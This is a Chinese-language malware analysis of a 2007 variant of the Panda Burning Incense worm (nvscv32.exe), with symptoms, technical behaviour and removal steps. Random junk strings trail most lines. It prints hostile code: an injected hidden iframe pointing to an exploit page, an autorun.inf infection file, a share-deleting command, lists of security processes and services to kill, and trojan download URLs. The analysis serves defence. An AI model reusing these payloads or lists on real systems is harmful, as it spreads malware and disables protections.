熊猫烧香最新变种分析及查杀方法

文件名称：nvscv32.exe @,6ST0xT (  
TNsg pJ?\  
病毒名称：目前各杀毒软件无法查杀（已经将病毒样本上报各杀毒厂商） %Rn:GK  
vahf]2jEB  
中文名称：（尼姆亚，熊猫烧香） M)=|<h"F  
cju@W]!  
病毒大小：68,570 字节 !u0U5>ccw  
Oy'0I,  
编写语言：Borland Delphi 6.0 - 7.0 a(Sv,@/  
7K !GK  
加壳方式：FSG 2.0 -> bart/xt bw;iz,Z  
sN@j5p^jc  
发现时间：2007.1.16 nOuN|q=C  
n2;(1qr  
危害等级：高 g^n;IE$B  
lxOqs:b  
一、病毒描述： =#'+"+lQ }  
|0DP} `~  
含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个 Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，并对局域网其他电脑进行扫描，同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。 z@n+7p`w  
Ps|QW  
二：中毒现象： _DrnL}9I7  
B{4"$Mi  
1：在系统每个分区根目录下存在setup.exe和autorun.inf文件（A和B盘不感染）。 w*2^/zh  
j,ZW[*M  
2：无法手工修改“文件夹选项”将隐藏文件显示出来。 -g$OOJB6  
Yoe les-  
3：在每个感染后的文件夹中可见Desktop_ini的隐藏文件，内容为感染日期 如：2007-1-16 * S{\#s  
QS%,7'EG  
4：电脑上的所有脚本文件中加入以下代码：<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe> &0i71!Oy  
m^Rd Iy)  
5:中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。 =_pmy>_z  
%IPyCEJD  
6：不能正常使用任务管理器，SREng.exe等工具。 6i^0T
 
&BTfDsxAK  
7：无故的向外发包，连接局域网中其他机器。 l]/> `62  
W
=M< c@  
三：技术分析 O{*GW0}55  
}o{!}g9  
1：病毒文件运行后,将自身复制到%SystemRoot%\system32\drivers\nvscv32.exe y#nSk%"t"  
~|qXtds$  
建立注册表自启动项: =X<)5IS3  
k~ZBJ+ 94  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] Hc"N& %X[  
@ikUM+A {  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" {M
A@A5  
i"KL;t[1  
2：查找反病毒窗体病毒结束相关进程: pO5v*oONz+  
e$x4Ux7*"  
天网防火墙 tvK rc  
7kO
E/>P?  
virusscan ?F!W#  
7-(>"75Q|  
symantec antivirus }q/(D?  
:R{x]sv  
system safety monitor <)=3XEcb  
Ae3,W  
system repair engineer VoWA
tNU  
CuF%[9[cT  
wrapped gift killer 4;",@}  
ZKZl>dDuh  
游戏木马检测大师 ;sm"\.jF  
VM=hQYe  
超级巡警 :Xh_$4~^Y  
ll 6]W~[ZC  
3：结束以下进程: PjiNu.>2(  
>2FAi.,  
mcshield.exe 4o)(d=q  
.ou!g&xu  
vstskmgr.exe $:T<IU[E  
"m wl-=  
naprdmgr.exe Q@ykQ  
|Gf1^8:C9  
updaterui.exe &?}kL= h  
^uKnP>*l
 
tbmon.exe yBJ/>SAcG  
jdV .{8@  
scan32.exe *1 n;p)K  
$,xtif0  
ravmond.exe /8 e2dw: \  
6~:W(E}  
ccenter.exe =$&7IQ?  
4r68`<mn[  
ravtask.exe [8B tIv  
U)O?| VN^o  
rav.exe 5bu[}mJ  
i*mZi4URN  
ravmon.exe JL}hOBqfI  
Wq=ZU\Y  
ravmond.exe )x_W&*oZ  
.(TQ5/ ~  
ravstub.exe fxLE]VJQ  
bIvJs9L  
kvxp.kxp 4GMa5]Ft  
f.U0E6-(3N  
kvmonxp.kxp =!1-AR%.^  
0~PXa(!^K  
kvcenter.kxp 1NE!=;VOl  
y^EF<<\  
kvsrvxp.exe "z{_hp{T^  
J};u25:}  
kregex.exe -D&.)N9ctQ  
T:w2  
uihost.exe }QX2:a  
[[/ }1%  
trojdie.kxp w /Bn2bD  
2|T|K?R^  
frogagent.exe _rWM]  
}5TfQV6  
kvxp.kxp PMz{8 F  
8|S1|t,  
kvmonxp.kxp $ g1wK}B3  
=,/A\F  
kvcenter.kxp q:EzKrE  
h;4y=UU  
kvsrvxp.exe ,Do$`yO+  
[t"_}t=w  
kregex.exe a6#{2q  
QXIbFv  
uihost.exe N>cp>&j
V  
LoV*YS
DAY  
trojdie.kxp [+:mt</HN  
Yq)YS]  
frogagent.exe s$DT.cvO  
Gct&}]3pm  
logo1_.exe \U<F\i  
@2%VU#!m  
logo_1.exe 8IT_mjj  
C,VqT6E<  
rundl132.exe ~q#[5l(r8  
6>LQGO  
taskmgr.exe 6/V{>MTZg  
~'Qpf 8)  
msconfig.exe kERaY9L\  
ZhJ|ZvJ  
regedit.exe "$,}|T?Y`  
om*tdG  
sreng.exe KOAz-h@6   
4：禁用下列服务: )z*$`?)k  
X"qbB4(I  
schedule S8W_$=4  
]' "^M  
sharedaccess um_M}t{  
,< )/45  
rsccenter u{E^<fW]  
#LNB@E  
rsravmon [ ;3EzZL  
43orR !.Z  
rsccenter  \3y=0  
''\cBM!  
kvwsc zOdasEd8!  
)*$  
kvsrvxp qS/71Kv'  
5@%=LPV  
kvwsc )8N)Z~h  
w4<u@L  
kvsrvxp 8 *(W |J  
D!D%.  
kavsvc ~_l:b  
WE Svkm;  
avp m?R+Z6c[  
s$nfY.C  
avp |\r\i&|g1  
loqS?bC]  
kavsvc ^x1D]+  
Kjca>/id  
mcafeeframework tB(X`A.|  
!f]3Riw-=,  
mcshield *i]Z=  
:EldP,s#x%  
mctaskmanager [F>n!`8  
C7*Yg$`{  
mcafeeframework j"$b%|  
0\y
tBxL  
mcshield s)7`r6w  
[#@p{[?r  
mctaskmanager $m%/veD k  
|sZ9/G7  
navapsvc BKjPmrZ|  
CYic_rF$  
wscsvc }y=n#%|i.  
$MVeMgPa  
kpfwsvc T.Y4L  
r Xk   
sndsrvc 1p5q}">z  
eEds-&_  
ccproxy {~p %\  
apWrcaj  
ccevtmgr vR.6^q  
nOoh2jUM  
ccsetmgr By"ul:.D  
E":":AC#  
spbbcsvc I:2jwAl  
[~r$US  
symantec core lc [(^''*7r+T  
^J=txsx  
npfmntor C g,w6<7  
)da8Ru  
mskservice "lj:bxM2C  
_xwfz]lb+  
firesvc
;og<eK  
RoXOGVo  
5：删除下列注册表项: Fl(ZKpSZU  

|`9zE]  
software\microsoft\windows\currentversion\run\ravtask eMMiSO!3  
pDS4_u  
software\microsoft\windows\currentversion\run\kvmonxp RPqn#B  
si4=C  
software\microsoft\windows\currentversion\run\kav '$nGtB5  
leqSS}KU+  
software\microsoft\windows\currentversion\run\kavpersonal50 $R}iL  
Jx[e{o)o  
software\microsoft\windows\currentversion\run\mcafeeupdaterui ;@\JscNJ|  
]V7hl#VO  
software\microsoft\windows\currentversion\run\network associates error reporting service x-k/rZ  
.TU15AAc  
software\microsoft\windows\currentversion\run\shstatexe 6*oTT(0<p  
BP><G^  
software\microsoft\windows\currentversion\run\ylive.exe $f-pLF+x  
N@ tb^M  
software\microsoft\windows\currentversion\run\yassistse <}>-ip?  
 ^*>no=A  
6：感染所有可执行文件，并将图标改成（这次不是熊猫烧香那个图标了） E*]L]vR  
xg!\C@$  
7：跳过下列目录: 3gXUfv2ID  
E)SOcM)  
windows 6m<9^NT  
os+wTUR^  
winnt e"09b<69  
e/l?|+m 6  
systemvolumeinformation iFT3fP'> 5  
5%$kAJZC-  
recycled c=mFYsSv  
-2XIF}.Hu  
windowsnt K_Gf\x  
\3UdC{~  
windowsupdate Xc<9[@  
M#IR=|P]  
windowsmediaplayer V#FLxITk  
35\0g&  
outlookexpress (bXp1*0 ;  
#_5+kBA+>'  
netmeeting ~#xRoB
y3  
S!c@6&XJm?  
commonfiles }6(:OB?  
0 N^V&k   
complusapplications }e6:&`a xD  
/qY(uPJ  
commonfiles Lf<9GYNy>`  
Sa(rl^qZ2  
messenger qd;f]ndo  
9]9(o  
installshieldinstallationinformation kF7Al]IgT  
,4UJ|D=J  
msn 79fg%cSb  
nhxl#  
microsoftfrontpage 6<GWDO  
;bbEd'  
moviemaker rJxT)bR  
m]vr|:{6/  
msngaminzone 1A *8Jnw  
CbQ%[x9|  
8：删除*.gho备份文件. Tj#XsD?J  
Gj?q+-d!(5  
9：在所有驱动器根目录建立自身文件副本setup.exe,建立autorun.inf文件使病毒自动运行,设置文件属性为隐藏、只读、系统. #,pL
Vt<  
suSIz 7:  
autorun.inf内容： [J#(k`@  
O*7~t17  
程序代码 %;gWl1&5  
{,-#;A*yW  
[AutoRun] w9BH>56/"  
Q^OzFfR6  
OPEN=setup.exe hkxZ=l  
}Z=Qy;zk  
shellexecute=setup.exe /J:j'6  
CSs6Vm!=  
shell\Auto\command=setup.exe  q\"$~*  
Q.yoxq  
10：删除共享：cmd.exe /c net share admin$ /del /y v|z1nD!?]  
W525:h52{  
11：在机器上所有脚本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>，此代码地址是一个利用MS-06014漏洞攻击的网页木马，一旦用户浏览中此病毒的服务器上的网页，如果系统没有打补丁，就会下载执行此病毒。 03y<'
n  
H9?~#GPb  
12：扫描局域网机器，一旦发现漏洞，就迅速传播。 !{LwX
 Kf  
13：在后台访问http://www.whboy.net/update/wormcn.txt，根据下载列表下载其他病毒。 dWSH\wm+  
X35hLp8 M  
目前下载列表如下： 3@JwL{C  
8'$n|<1X  
http://www.krvkr.com/down/cq.exe 5kz`_\&  
UK/k?0  
http://www.krvkr.com/down/mh.exe zrM|8C
u  
,#{aAx|]  
http://www.krvkr.com/down/my.exe AnQRSB
(  
FS0SGBo  
http://www.krvkr.com/down/wl.exe 'UKB
pm/  
a6C~!{'nW  
http://www.krvkr.com/down/rx.exe xOH@V4z:  
4P5wEqU.<  
http://www.krvkr.com/down/wow.exe c`cPGEv  
R<U<Y'Y  
http://www.krvkr.com/down/zt.exe 2vLn#  
MtljI6  
http://www.krvkr.com/down/wm.exe 3ly|y{M",  
uU0'y4=  
http://www.krvkr.com/down/dj.exe r=;k[*;{  
Bb6_['y  
http://www.krvkr.com/cn/iechajian.exe e BPMT  
~rD* Y&#.  
到此病毒行为分析完毕。 +9t@eHJT1  
Z q)A"'Y  
四：Sec120.Com专家解决方案： y!j1xnzki  
tfO _b5g  
1：关闭网络共享，断开网络。 SrxX-Hir  
LdcP0G\"VG  
2：使用IceSword结束掉nvscv32.exe进程（速度要快，抢在病毒感染IceSword前） a[!':-R`s  
b1+Nm  
3:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的数值改为1 PeOgXg)L`z  
Y (Q8P{@(  
4：删除注册表启动项 gyIPG2d  
#*fB~Os:  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] ufmFeeg  
6xwC1V?:0t  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" Xv9CD  
Z(#a-_g  
5：删除C:\WINDOWS\system32\drivers\nvscv32.exe \|kU{d0  
SRMy#j-  
6：删除每个盘根目录下的autorun.inf文件和setup.exe文件，利用搜索功能，将Desktop_.ini全部删除。 / wEr>[8S  
-7CkOZT  
7：如果电脑上有脚本文件，将病毒代码全部删除。 &A>J>b  
>PTq5pk  
8：关闭系统的自动播放功能。 |e!Sm{#!  
*<KY^;  
这样就基本上将病毒清除了